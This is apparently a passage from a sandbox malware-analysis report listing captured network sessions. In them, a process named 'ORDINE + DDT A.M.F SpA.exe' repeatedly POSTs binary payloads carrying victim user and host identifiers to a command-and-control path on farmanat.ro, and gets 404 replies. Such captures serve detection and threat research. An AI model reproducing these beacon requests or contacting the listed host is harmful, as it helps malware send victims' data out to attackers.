                                              Nov 25, 2021 10:54:53.053774118 CET7418OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:53.105624914 CET7418INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              801192.168.11.2050649176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:53.534334898 CET7419OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:53.567799091 CET7419OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:53.617039919 CET7420INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              802192.168.11.2050650176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:54.011786938 CET7420OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:54.045353889 CET7421OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:54.099575996 CET7421INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              803192.168.11.2050651176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:54.518848896 CET7422OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:54.553011894 CET7422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:54.604268074 CET7422INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              804192.168.11.2050652176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:55.034068108 CET7423OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:55.068362951 CET7423OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:55.121545076 CET7424INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              805192.168.11.2050653176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:55.547945023 CET7425OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:55.581582069 CET7425OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:55.630640984 CET7425INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              806192.168.11.2050654176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:56.056137085 CET7426OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:56.090389013 CET7426OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:56.140597105 CET7427INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              807192.168.11.2050655176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:56.566469908 CET7427OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:56.599968910 CET7428OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:56.652795076 CET7428INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              808192.168.11.2050656176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:57.072319984 CET7429OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:57.106746912 CET7429OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:57.157145023 CET7429INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              809192.168.11.2050657176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:57.565910101 CET7430OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:57.600450039 CET7430OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:57.650789022 CET7431INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              81192.168.11.2049918176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:51.567286015 CET6427OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:51.600946903 CET6427OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:51.650368929 CET6428INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              810192.168.11.2050658176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:58.031225920 CET7431OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:58.064599991 CET7432OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:58.114200115 CET7432INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              811192.168.11.2050659176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:58.463608027 CET7433OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:58.497852087 CET7433OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:58.547542095 CET7433INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              812192.168.11.2050660176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:58.966615915 CET7434OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:59.000210047 CET7434OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:59.050348043 CET7435INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              813192.168.11.2050661176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:59.471626043 CET7435OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:59.505177975 CET7436OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:59.554025888 CET7436INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              814192.168.11.2050662176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:59.978508949 CET7437OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:00.012969971 CET7437OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:00.063477039 CET7437INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              815192.168.11.2050663176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:00.435672998 CET7438OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:00.469307899 CET7438OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:00.520142078 CET7439INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              816192.168.11.2050664176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:00.937403917 CET7439OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:00.971019030 CET7440OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:01.021702051 CET7440INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              817192.168.11.2050665176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:01.418915033 CET7441OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:01.453049898 CET7441OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:01.505518913 CET7441INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              818192.168.11.2050666176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
